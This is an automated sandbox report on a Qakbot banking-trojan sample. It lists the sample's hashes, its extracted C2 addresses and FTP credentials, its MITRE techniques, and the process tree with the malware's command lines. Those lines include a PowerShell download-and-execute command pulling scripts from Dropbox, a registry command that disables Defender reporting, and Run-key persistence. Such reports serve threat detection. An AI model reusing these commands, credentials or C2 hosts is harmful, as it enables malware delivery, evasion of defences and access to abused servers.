qakbot | 5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1

General

Target

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
Size

596KB
MD5

310e65a59d3c670bc2bededf7ddef03e
SHA1

77153c24512610f9ff8e00bf944a9fee8c8f2974
SHA256

5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1
SHA512

b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8
SSDEEP

6144:BwzoiTihMxUxXH/64Hlh64tEfqpoSliPic7p0mO2WDJNkHtcvvwzRfI5aCieTVU:GzhTicUxlGUxoVPi79qHteyfIEeT

Score

10^/10

qakbot mc06 1527585056 banker execution persistence stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1

ps1.dropper

https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Version

322.358

Botnet

mc06

Campaign

1527585056

Credentials

Protocol: ftp
Host:
37.60.244.211
Port:
21
Username:
[email protected]
Password:
4AsEzIaMwi2d

Protocol: ftp
Host:
198.38.77.162
Port:
21
Username:
[email protected]
Password:
kJm6DKVPfyiv

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
[email protected]
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
[email protected]
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
[email protected]
Password:
RoP4Af0RKAAQ74V

C2

71.168.229.249:995

216.21.168.27:32101

216.218.74.196:443

46.177.55.119:443

66.222.48.40:443

93.108.180.227:443

47.40.29.239:443

184.180.157.203:2222

47.40.208.189:443

71.168.229.249:443

216.93.143.182:995

98.16.70.197:2222

75.127.141.50:995

96.248.15.254:995

74.87.248.174:2222

75.189.235.216:443

66.42.182.18:995

50.252.93.122:995

105.187.37.52:443

190.137.254.188:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

5 2508 powershell.exe
6 2508 powershell.exe
7 2508 powershell.exe
8 2508 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

oloyme.exeoloyme.exe

pid process

2924 oloyme.exe
2576 oloyme.exe
Loads dropped DLL 3 IoCs

Processes:

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeoloyme.exe

pid process

1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
1900 310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
2924 oloyme.exe

flow	pid	process
5	2508	powershell.exe
6	2508	powershell.exe
7	2508	powershell.exe
8	2508	powershell.exe

pid	process
2924	oloyme.exe
2576	oloyme.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\xpxtwgita = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Oloymel\\oloyme.exe\""	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2508 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1196 PING.EXE

pid	process
2508	powershell.exe

pid	process
1196	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeoloyme.exepowershell.exeoloyme.exeexplorer.exetaskhost.exeDwm.exeExplorer.EXEconhost.execmd.execonhost.exePING.EXE

pid	process
1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
2228	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
2228	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
2924	oloyme.exe
2508	powershell.exe
2576	oloyme.exe
2576	oloyme.exe
2388	explorer.exe
1060	taskhost.exe
2388	explorer.exe
1116	Dwm.exe
1144	Explorer.EXE
1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
2508	powershell.exe
2516	conhost.exe
2388	explorer.exe
1560	cmd.exe
2136	conhost.exe
1196	PING.EXE
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe
2388	explorer.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

oloyme.exe

pid process

2924 oloyme.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2508 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

1144 Explorer.EXE
1144 Explorer.EXE
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

Explorer.EXE

pid process

1144 Explorer.EXE
1144 Explorer.EXE

pid	process
2924	oloyme.exe

description	pid	process
Token: SeDebugPrivilege	2508	powershell.exe

pid	process
1144	Explorer.EXE
1144	Explorer.EXE

pid	process
1144	Explorer.EXE
1144	Explorer.EXE

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exeoloyme.exeexplorer.execmd.exe

description	pid	process	target process
PID 1900 wrote to memory of 2228	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 1900 wrote to memory of 2228	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 1900 wrote to memory of 2228	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 1900 wrote to memory of 2228	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 1900 wrote to memory of 2924	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	oloyme.exe
PID 1900 wrote to memory of 2924	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	oloyme.exe
PID 1900 wrote to memory of 2924	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	oloyme.exe
PID 1900 wrote to memory of 2924	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	oloyme.exe
PID 1900 wrote to memory of 2600	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	reg.exe
PID 1900 wrote to memory of 2600	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	reg.exe
PID 1900 wrote to memory of 2600	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	reg.exe
PID 1900 wrote to memory of 2600	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	reg.exe
PID 1900 wrote to memory of 2508	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	powershell.exe
PID 1900 wrote to memory of 2508	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	powershell.exe
PID 1900 wrote to memory of 2508	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	powershell.exe
PID 1900 wrote to memory of 2508	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	powershell.exe
PID 2924 wrote to memory of 2576	2924	oloyme.exe	oloyme.exe
PID 2924 wrote to memory of 2576	2924	oloyme.exe	oloyme.exe
PID 2924 wrote to memory of 2576	2924	oloyme.exe	oloyme.exe
PID 2924 wrote to memory of 2576	2924	oloyme.exe	oloyme.exe
PID 2924 wrote to memory of 2388	2924	oloyme.exe	explorer.exe
PID 2924 wrote to memory of 2388	2924	oloyme.exe	explorer.exe
PID 2924 wrote to memory of 2388	2924	oloyme.exe	explorer.exe
PID 2924 wrote to memory of 2388	2924	oloyme.exe	explorer.exe
PID 2924 wrote to memory of 2388	2924	oloyme.exe	explorer.exe
PID 2388 wrote to memory of 1060	2388	explorer.exe	taskhost.exe
PID 2388 wrote to memory of 1060	2388	explorer.exe	taskhost.exe
PID 2388 wrote to memory of 1060	2388	explorer.exe	taskhost.exe
PID 2388 wrote to memory of 1116	2388	explorer.exe	Dwm.exe
PID 2388 wrote to memory of 1116	2388	explorer.exe	Dwm.exe
PID 2388 wrote to memory of 1116	2388	explorer.exe	Dwm.exe
PID 2388 wrote to memory of 1144	2388	explorer.exe	Explorer.EXE
PID 2388 wrote to memory of 1144	2388	explorer.exe	Explorer.EXE
PID 2388 wrote to memory of 1144	2388	explorer.exe	Explorer.EXE
PID 2388 wrote to memory of 1900	2388	explorer.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 2388 wrote to memory of 1900	2388	explorer.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 2388 wrote to memory of 1900	2388	explorer.exe	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
PID 2388 wrote to memory of 2508	2388	explorer.exe	powershell.exe
PID 2388 wrote to memory of 2508	2388	explorer.exe	powershell.exe
PID 2388 wrote to memory of 2508	2388	explorer.exe	powershell.exe
PID 2388 wrote to memory of 2516	2388	explorer.exe	conhost.exe
PID 2388 wrote to memory of 2516	2388	explorer.exe	conhost.exe
PID 2388 wrote to memory of 2516	2388	explorer.exe	conhost.exe
PID 1900 wrote to memory of 1560	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	cmd.exe
PID 1900 wrote to memory of 1560	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	cmd.exe
PID 1900 wrote to memory of 1560	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	cmd.exe
PID 1900 wrote to memory of 1560	1900	310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe	cmd.exe
PID 1560 wrote to memory of 1196	1560	cmd.exe	PING.EXE
PID 1560 wrote to memory of 1196	1560	cmd.exe	PING.EXE
PID 1560 wrote to memory of 1196	1560	cmd.exe	PING.EXE
PID 1560 wrote to memory of 1196	1560	cmd.exe	PING.EXE
PID 2388 wrote to memory of 1560	2388	explorer.exe	cmd.exe
PID 2388 wrote to memory of 1560	2388	explorer.exe	cmd.exe
PID 2388 wrote to memory of 1560	2388	explorer.exe	cmd.exe
PID 2388 wrote to memory of 2136	2388	explorer.exe	conhost.exe
PID 2388 wrote to memory of 2136	2388	explorer.exe	conhost.exe
PID 2388 wrote to memory of 2136	2388	explorer.exe	conhost.exe
PID 2388 wrote to memory of 1196	2388	explorer.exe	PING.EXE
PID 2388 wrote to memory of 1196	2388	explorer.exe	PING.EXE
PID 2388 wrote to memory of 1196	2388	explorer.exe	PING.EXE

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1060

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1116

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1144

C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1900

C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe" /C
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2228

C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2924

C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe" /C
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2576

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
4⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
3⤵
PID:2600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\tgjzpgomlpowqkdhfoncomzifwx.txt'"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\310e65a59d3c670bc2bededf7ddef03e_JaffaCakes118.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\SysWOW64\PING.EXE
ping.exe -n 6 127.0.0.1
4⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
PID:1196

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2024534483387295825-1226544225-361700570-1095156984-1620815177-1678529461-595417556"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2516

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1878583734-201756559515280159611729853069-131787287212318128711383084895391165972"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloym.dat
Filesize
91B

MD5
eecd584cd13a011d0d867f3c98b08a80

SHA1
60154e3a34c8147d82c037dd802b71871ffce365

SHA256
24574646ffa9166ff050ceecfe5034891037540882b76eef00ac75f38b540df0

SHA512
f34a880842e9dc5206247596fdfe99e76996b304cc96d029a34767700e533eb228014a63613d0cdf15148a19439c3dea720408beca06877e93dc6499cee8ffb5

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Oloymel\oloyme.exe
Filesize
596KB

MD5
310e65a59d3c670bc2bededf7ddef03e

SHA1
77153c24512610f9ff8e00bf944a9fee8c8f2974

SHA256
5cfbe018afa45304fb2d7775f635101ee4226ba594bb30cc0e5c017fd1d30da1

SHA512
b2d7f3c16fa3f080a72b02b70319b1ab821a8910851e33e4655784f5371931782d58c92a2ddf37d0f5e429133b84481743f9b80a357e6a2615206c5e323d61a8

Download Submit
memory/1060-45-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1060-39-0x00000000002B0000-0x00000000002DC000-memory.dmp

Filesize
176KB

Download
memory/1060-46-0x00000000002B0000-0x00000000002DC000-memory.dmp

Filesize
176KB

Download
memory/1060-41-0x0000000002060000-0x000000000208D000-memory.dmp

Filesize
180KB

Download
memory/1060-43-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1116-55-0x0000000001EE0000-0x0000000001F0C000-memory.dmp

Filesize
176KB

Download
memory/1144-70-0x0000000002DA0000-0x0000000002DCC000-memory.dmp

Filesize
176KB

Download
memory/1900-72-0x0000000000630000-0x0000000000658000-memory.dmp

Filesize
160KB

Download
memory/1900-1-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/1900-0-0x00000000001C0000-0x00000000001C6000-memory.dmp

Filesize
24KB

Download
memory/1900-74-0x0000000002230000-0x0000000002259000-memory.dmp

Filesize
164KB

Download
memory/1900-78-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/1900-79-0x0000000000630000-0x0000000000658000-memory.dmp

Filesize
160KB

Download
memory/1900-81-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2228-8-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2228-7-0x00000000002A0000-0x00000000002A6000-memory.dmp

Filesize
24KB

Download
memory/2388-59-0x0000000002490000-0x00000000024BF000-memory.dmp

Filesize
188KB

Download
memory/2388-57-0x0000000002490000-0x00000000024BF000-memory.dmp

Filesize
188KB

Download
memory/2388-60-0x0000000002490000-0x00000000024BF000-memory.dmp

Filesize
188KB

Download
memory/2388-58-0x0000000000110000-0x000000000017A000-memory.dmp

Filesize
424KB

Download
memory/2388-61-0x0000000002490000-0x00000000024BF000-memory.dmp

Filesize
188KB

Download
memory/2388-38-0x0000000000110000-0x000000000017A000-memory.dmp

Filesize
424KB

Download
memory/2388-36-0x0000000000110000-0x000000000017A000-memory.dmp

Filesize
424KB

Download
memory/2508-27-0x0000000002760000-0x0000000002768000-memory.dmp

Filesize
32KB

Download
memory/2508-26-0x000000001B520000-0x000000001B802000-memory.dmp

Filesize
2.9MB

Download
memory/2576-34-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download
memory/2924-35-0x0000000000400000-0x0000000000498000-memory.dmp

Filesize
608KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads